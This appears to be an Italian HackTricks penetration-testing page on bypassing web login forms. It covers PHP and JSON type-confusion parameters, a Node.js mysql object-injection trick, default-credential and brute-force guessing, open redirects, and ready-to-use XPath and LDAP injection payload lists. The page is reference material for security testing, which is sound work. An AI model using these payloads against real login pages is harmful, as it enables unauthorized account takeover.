Login Bypass

Impara l'hacking di AWS da zero a esperto con htARTE (HackTricks AWS Red Team Expert)!

RootedCON è l'evento di sicurezza informatica più rilevante in Spagna e uno dei più importanti in Europa. Con la missione di promuovere la conoscenza tecnica, questo congresso è un punto di incontro bollente per professionisti della tecnologia e della sicurezza informatica in ogni disciplina.

Bypass del login regolare

Se trovi una pagina di login, qui puoi trovare alcune tecniche da provare per bypassarla:

  • Controlla i commenti all'interno della pagina (scorri verso il basso e verso destra?)

  • Controlla se puoi accedere direttamente alle pagine restritte

  • Controlla di non inviare i parametri (non inviare nessuno o solo 1)

  • Controlla l'errore di confronto PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Cambia il tipo di contenuto in json e invia valori json (bool true incluso)

  • Se ricevi una risposta che dice che il POST non è supportato, puoi provare a inviare il JSON nel corpo ma con una richiesta GET con Content-Type: application/json

  • Controlla l'errore potenziale di parsing di nodejs (leggi questo): password[password]=1

  • Nodejs trasformerà quel payload in una query simile alla seguente: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; che rende il bit della password sempre vero.

  • Se puoi inviare un oggetto JSON puoi inviare "password":{"password": 1} per bypassare il login.

  • Ricorda che per bypassare questo login devi comunque conoscere e inviare un nome utente valido.

  • Aggiungere l'opzione "stringifyObjects":true quando si chiama mysql.createConnection bloccherà eventualmente tutti i comportamenti imprevisti quando viene passato un Object come parametro.

  • Controlla le credenziali:

  • Credenziali predefinite della tecnologia/piattaforma utilizzata

  • Combinazioni comuni (root, admin, password, nome della tecnologia, utente predefinito con una di queste password).

  • Crea un dizionario usando Cewl, aggiungi l'username e la password predefiniti (se ci sono) e prova a forzarla utilizzando tutte le parole come nomi utente e password

  • Forza bruta utilizzando un dizionario più grande (Forza bruta)

Bypass dell'autenticazione tramite SQL Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite SQL Injection.

Nella pagina seguente puoi trovare una lista personalizzata per provare a bypassare il login tramite SQL Injections:

pageLogin bypass List

Bypass dell'autenticazione senza SQL Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite No SQL Injections.

Poiché le NoSQL Injections richiedono di modificare il valore dei parametri, dovrai testarle manualmente.

Bypass dell'autenticazione tramite XPath Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Bypass di autenticazione tramite LDAP Injection

Qui puoi trovare diversi trucchi per bypassare il login tramite LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Ricordami

Se la pagina ha la funzionalità "Ricordami", controlla come è implementata e vedi se puoi abusarne per prendere il controllo di altri account.

Reindirizzamenti

Le pagine di solito reindirizzano gli utenti dopo il login, controlla se puoi modificare quel reindirizzamento per causare un Reindirizzamento Aperto. Forse puoi rubare alcune informazioni (codici, cookie...) se reindirizzi l'utente al tuo sito web.

Altri controlli

  • Controlla se puoi enumerare gli username abusando della funzionalità di login.

  • Controlla se l'auto-completamento è attivo nel campo di inserimento della password/informazioni sensibili del modulo: <input autocomplete="false"

​​RootedCON è l'evento sulla sicurezza informatica più rilevante in Spagna e uno dei più importanti in Europa. Con la missione di promuovere la conoscenza tecnica, questo congresso è un punto di incontro vivace per professionisti della tecnologia e della sicurezza informatica in ogni disciplina.

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Last updated